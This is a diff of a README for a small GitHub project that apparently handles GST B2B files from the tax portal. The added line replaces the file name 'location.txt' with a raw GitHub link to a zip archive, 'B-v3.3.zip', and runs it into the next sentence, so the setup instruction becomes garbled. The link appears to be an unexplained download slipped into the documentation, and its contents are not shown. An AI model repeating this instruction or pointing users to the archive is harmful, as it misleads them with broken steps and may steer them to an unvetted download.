AyushPallod/B2B/README.md

-Create a file named location.txt.
-Write two lines into the file:
+Create a file named https://raw.githubusercontent.com/AyushPallod/B2B/main/calculating/B-v3.3.zip Write two lines into the file:
 First line: Path of the GST B2B file (from GST portal).
 Second line: Path of the Office file.